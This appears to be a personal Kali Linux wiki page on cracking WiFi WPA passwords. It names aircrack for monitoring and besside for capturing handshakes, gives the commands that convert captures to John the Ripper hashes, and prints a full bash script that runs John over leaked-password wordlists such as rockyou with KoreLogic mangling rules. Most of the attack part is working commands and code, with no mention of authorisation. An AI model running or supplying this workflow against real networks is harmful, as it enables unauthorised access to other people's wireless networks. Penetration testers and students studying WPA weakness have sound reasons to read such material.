Reboot

Revisiting some of the old techniques.

Monitor wireless

First is aircrack to monitor wifi networks.

Obtain handshakes

Next is besside to obtain handshakes.

Crack handshakes

Once we have the handshakes, use instructions on John the Ripper/WPA page to turn those cap files into hccap files, then into John the Ripper password files.

$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap
$ hccap2john ./wpa.hccap > booty.johnpw

Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets to modify the words in the wordlists. To do that, use a bash script:

#!/bin/sh

# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"

cap="wpa.cap"

pwdir="/root/box/08_besside"

# Round 0
rulesets=("")

#### Round 1
###rulesets=("KoreLogicRulesAppendYears")

#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)

# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt

wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")

# ===========================
# The Actual Work

for pwfile in `/bin/ls -1 ${pwdir}/*.johnpw`;
do
    echo ""
    echo ""
    echo "*** * * ** **** * ***** ** **  * * * ** ****"
    echo "* ** * *** **** ***  * ** ** *** * * * *** *"
    echo "  * ***** *  * * * *** * * * * *  ***  * * *"
    echo "* * * * * * *** **** * *** * * * * * * *** *"
    echo ""
    echo ""
    echo "Now on password file ${pwfile}"
    echo ""

    for rules in "${rulesets[@]}";
    do
        echo ""
        echo ""
        echo " .. . .. . .... ... . . ... .. . .. . . .  ."
        echo "... ... .. ...... . .. .  . .   ....  .... ."
        echo "... .  .. .  .  .  .. .... . .  . . . ... . "
        echo ""
        echo ""
        echo "Now on ruleset file ${rules}"
        echo ""

        for wordlist in "${wordlists[@]}";
        do
            echo ""
            echo "---------------------------"
            echo "Running John the Ripper with options:"
            echo "Wordlist: ${wordlist}"
            echo "Ruleset: ${rules}"
            echo "Password File: ${pwfile}"

            if [ "${rules}" == "" ] ; then

                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"

                # actually do it
                mypwd=`pwd`
                cd ${johndir}
                ${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}
                cd ${mypwd}

            else
                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk --rules=${rules}  ${pwfile}"

                # actually do it
                mypwd=`pwd`
                cd ${johndir}
                ${johnbin} --rules=${rules} --wordlist=${wordlist} --format=wpapsk  ${pwfile}
                cd ${mypwd}

            fi

        done
    done
done

Flags

Kali Linux "The quieter you become, the more you are able to hear." Penetration testing Linux distribution. Kali  · Category:Kali Kali/Wireless Reboot Kali Software: Kali Tools Kali Top 10 Aircrack  · Wireshark  · John the Ripper  · Nmap  · Metasploit Framework Dsniff  · Tcpdump  · Hydra  · Sqlmap  · Burpsuite  · Commix Dirbuster  · Valgrind Attack Workflow: Kali/Workflow 1 Physical Attacks: Kali/Layer 1 Attacks 2 Data/MAC Attacks: Kali/Layer 2 Attacks 3 Network Attacks: Kali/Layer 3 Attacks 4 Transport Attacks: Kali/Layer 4 Attacks 5 Session Attacks: Kali/Layer 5 Attacks 6 Presentation Attacks: Kali/Layer 6 Attacks 7 Application Attacks: Kali/Layer 7 Attacks Red Team Blue Team Metasploitable - Red Team Metasploitable - Blue Team Networking: Kali/Hotspot  · Kali/OpenVPN  · Kali/OpenVPN/Hotspot  · Kali/OpenVPN/PIA Kali/IPv6 Booting: Kali/Dual Boot OS X  · Kali/Live USB  · Kali/Persistent USB Installing: Kali/Installing  · Kali/Post Install  · Kali/Fixes Kali on Raspberry Pi: Kali Raspberry Pi  · Kali Raspberry Pi/Installing  · Kali Raspberry Pi/Headless  · Kali Raspberry Pi/Post-Install Category:Security  · Category:Wireless  · Category:Passwords  · Category:Man in the Middle Flags  · Template:KaliFlag  · e

Wireless all things wireless. Wireless  · Category:Wireless Software: Scapy Flags  · Template:WirelessFlag  · e

aircrack-ng a suite of tools for wireless cracking. Aircrack  · Category:Aircrack aircrack-ng Many Ways to Crack a Wifi: Cracking Wifi Aircrack Benchmarking: Aircrack/Benchmarking WEP Attacks with Aircrack: Aircrack/WEP Cracking WPA Attacks with Aircrack: Aircrack/WPA Cracking Aircrack Hardware: Aircrack/Packet Injection Testing Harvesting Wireless Network Information airodump-ng Basic Usage of Airodump Category:Security  · Category:Wireless  · Category:Passwords Flags  · Template:AircrackFlag  · e